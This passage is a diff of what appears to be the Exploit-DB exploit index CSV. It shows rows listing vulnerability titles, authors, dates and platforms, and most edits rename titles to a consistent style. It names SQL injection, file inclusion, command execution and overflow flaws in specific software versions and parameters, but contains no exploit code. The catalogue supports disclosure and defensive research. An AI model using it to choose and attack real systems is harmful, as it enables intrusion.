24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 - Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0 @@ -13071,7 +13071,7 @@ id,file,description,date,author,platform,type,port 25190,platforms/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0 25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",multiple,remote,0 25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0 -29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 +29277,platforms/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0 24999,platforms/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0 25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,windows,remote,0 25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote,0 @@ -13234,7 +13234,7 @@ id,file,description,date,author,platform,type,port 25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit",2013-06-05,kingcope,php,remote,0 25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0 25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0 -25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0 +25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0 25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0 26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0 @@ -17705,7 +17705,7 @@ id,file,description,date,author,platform,type,port 4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 -4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Blind SQL Injection",2007-07-29,EgiX,php,webapps,0 +4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,php,webapps,0 4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 4248,platforms/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection",2007-08-02,uimp,php,webapps,0 @@ -17782,7 +17782,7 @@ id,file,description,date,author,platform,type,port 4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 -4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0 +4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0 4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0 @@ -17872,7 +17872,7 @@ id,file,description,date,author,platform,type,port 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0 4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0 -4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection",2007-10-11,s4mi,php,webapps,0 +4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0 @@ -18453,45 +18453,45 @@ id,file,description,date,author,platform,type,port 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 -5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0 -5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 -5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie - (id_gal) SQL Injection",2008-04-03,S@BUN,php,webapps,0 -5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,php,webapps,0 -5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection",2008-04-03,Houssamix,php,webapps,0 -5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection",2008-04-03,Stack,php,webapps,0 -5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 -5362,platforms/php/webapps/5362.txt,"Comdev News Publisher - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - (incl_page) Remote File Inclusion",2008-04-04,JIKO,php,webapps,0 -5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 -5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 -5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0 +5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion",2008-04-02,w0cker,php,webapps,0 +5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion",2008-04-02,w0cker,php,webapps,0 +5350,platforms/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0 +5351,platforms/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0 +5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection",2008-04-03,Houssamix,php,webapps,0 +5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection",2008-04-03,Stack,php,webapps,0 +5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5360,platforms/php/webapps/5360.txt,"Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 +5362,platforms/php/webapps/5362.txt,"Comdev News Publisher 4.1.2 - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion",2008-04-04,JIKO,php,webapps,0 +5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 +5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' Parameter SQL Injection",2008-04-04,"Virangar Security",php,webapps,0 +5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Parameter Local File Inclusion",2008-04-04,w0cker,php,webapps,0 5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps,0 5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php forum' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0 -5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5373,platforms/asp/webapps/5373.txt,"Cobalt 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0 +5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0 5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 -5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 +5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0 5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0 5380,platforms/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0 5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,php,webapps,0 -5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'index.php categorie' SQL Injection",2008-04-06,parad0x,php,webapps,0 -5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps,0 +5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' Parameter SQL Injection",2008-04-06,parad0x,php,webapps,0 +5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' Parameter SQL Injection",2008-04-06,S@BUN,php,webapps,0 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0 -5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum.php forum' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 +5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' Parameter SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0 5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0 -5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - (project) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - 'project' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0 -5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 - (maps plugin) Remote Command Execution",2008-04-07,EgiX,php,webapps,0 -5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 +5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0 +5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0 5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 @@ -19153,7 +19153,7 @@ id,file,description,date,author,platform,type,port 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0 6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 -6192,platforms/php/webapps/6192.txt,"k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 +6192,platforms/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps,0 6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 6199,platforms/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps,0 @@ -19193,7 +19193,7 @@ id,file,description,date,author,platform,type,port 6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0 6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0 6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0 -6270,platforms/php/webapps/6270.txt,"SFS Affiliate Directory - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 +6270,platforms/php/webapps/6270.txt,"Affiliate Directory - 'id' Parameter SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6271,platforms/php/webapps/6271.txt,"Ad Board - 'id' SQL Injection",2008-08-19,"Hussin X",php,webapps,0 6273,platforms/php/webapps/6273.txt,"SunShop 4.1.4 - 'id' SQL Injection",2008-08-19,"GulfTech Security",php,webapps,0 6276,platforms/php/webapps/6276.txt,"Banner Management Script - 'tr.php id' SQL Injection",2008-08-19,S.W.A.T.,php,webapps,0 @@ -19648,7 +19648,7 @@ id,file,description,date,author,platform,type,port 6891,platforms/php/webapps/6891.txt,"Absolute Form Processor 4.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0 +6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0 6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0 6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6897,platforms/php/webapps/6897.txt,"cpanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 @@ -19659,7 +19659,7 @@ id,file,description,date,author,platform,type,port 6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 6904,platforms/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 @@ -23038,7 +23038,7 @@ id,file,description,date,author,platform,type,port 12619,platforms/php/webapps/12619.txt,"Cybertek CMS - Local File Inclusion",2010-05-16,XroGuE,php,webapps,0 12620,platforms/php/webapps/12620.txt,"The iceberg - 'Content Management System' SQL Injection",2010-05-16,cyberlog,php,webapps,0 12623,platforms/php/webapps/12623.txt,"Joomla! Component 'com_simpledownload' 0.9.5 - Local File Disclosure",2010-05-16,ALTBTA,php,webapps,0 -12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 +12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - 'rotate.php' Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0 @@ -25553,7 +25553,7 @@ id,file,description,date,author,platform,type,port 20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0 20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0 20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0 -20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 +20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21007,platforms/php/webapps/21007.txt,"AV Arcade Free Edition - 'add_rating.php id Parameter' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 @@ -28728,10 +28728,10 @@ id,file,description,date,author,platform,type,port 27188,platforms/ios/webapps/27188.txt,"Private Photos 1.0 iOS - Persistent Cross-Site Scripting",2013-07-29,Vulnerability-Lab,ios,webapps,0 27189,platforms/ios/webapps/27189.txt,"WebDisk 3.0.2 PhotoViewer iOS - Command Execution",2013-07-29,Vulnerability-Lab,ios,webapps,0 27190,platforms/php/webapps/27190.txt,"FluxBB 1.5.3 - Multiple Vulnerabilities",2013-07-29,LiquidWorm,php,webapps,0 -27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'index.php' lang Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 -27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 -27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - sec_stage_install.php language Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 -27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - forth_stage_install.php language Variable POST Method Local File Inclusion",2006-02-11,rgod,php,webapps,0 +27192,platforms/php/webapps/27192.txt,"LinPHA 0.9.x/1.0 - 'lang' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 +27193,platforms/php/webapps/27193.txt,"LinPHA 0.9.x/1.0 - 'install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 +27194,platforms/php/webapps/27194.txt,"LinPHA 0.9.x/1.0 - 'sec_stage_install.php' Parameter Local File Inclusion",2006-02-11,rgod,php,webapps,0 +27195,platforms/php/webapps/27195.txt,"LinPHA 0.9.x/1.0 - 'forth_stage_install.php' Local File Inclusion",2006-02-11,rgod,php,webapps,0 27197,platforms/php/webapps/27197.txt,"ImageVue 0.16.1 - dir.php Folder Permission Disclosure",2006-02-11,zjieb,php,webapps,0 27198,platforms/php/webapps/27198.txt,"ImageVue 0.16.1 - readfolder.php path Variable Arbitrary Directory Listing",2006-02-11,zjieb,php,webapps,0 27199,platforms/php/webapps/27199.txt,"ImageVue 0.16.1 - 'index.php' bgcol Parameter Cross-Site Scripting",2006-02-11,zjieb,php,webapps,0 @@ -29078,7 +29078,6 @@ id,file,description,date,author,platform,type,port 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 - Global Variable Overwrite",2006-04-17,imei,php,webapps,0 27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 - 'index.php' Local File Inclusion",2006-04-17,imei,php,webapps,0 -27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0 27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI - Cross-Site Scripting",2006-04-18,Qex,cgi,webapps,0 27673,platforms/php/webapps/27673.txt,"PHPLinks 2.1.2/2.1.3 - 'index.php' Cross-Site Scripting",2006-04-18,r0t,php,webapps,0 27674,platforms/php/webapps/27674.txt,"RechnungsZentrale 2 1.1.3 - Authent.php4 SQL Injection",2006-04-18,"GroundZero Security",php,webapps,0 @@ -30006,7 +30005,6 @@ id,file,description,date,author,platform,type,port 28963,platforms/php/webapps/28963.txt,"Bitweaver 1.x - fisheye/index.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28964,platforms/php/webapps/28964.txt,"Bitweaver 1.x - wiki/orphan_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28965,platforms/php/webapps/28965.txt,"Bitweaver 1.x - wiki/list_pages.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 - 'index.php' Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28970,platforms/php/webapps/28970.txt,"WordPress Plugin Dexs PM System - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80 @@ -30391,7 +30389,6 @@ id,file,description,date,author,platform,type,port 29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 -29495,platforms/php/webapps/29495.txt,"Sabros.US 1.7 - 'index.php' Cross-Site Scripting",2007-01-18,CorryL,php,webapps,0 29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0 29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0 @@ -30664,7 +30661,7 @@ id,file,description,date,author,platform,type,port 29796,platforms/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps,0 29797,platforms/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps,0 29802,platforms/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps,0 -29805,platforms/php/webapps/29805.txt,"Drake CMS 0.3.7 - 404.php Local File Inclusion",2007-03-30,"HACKERS 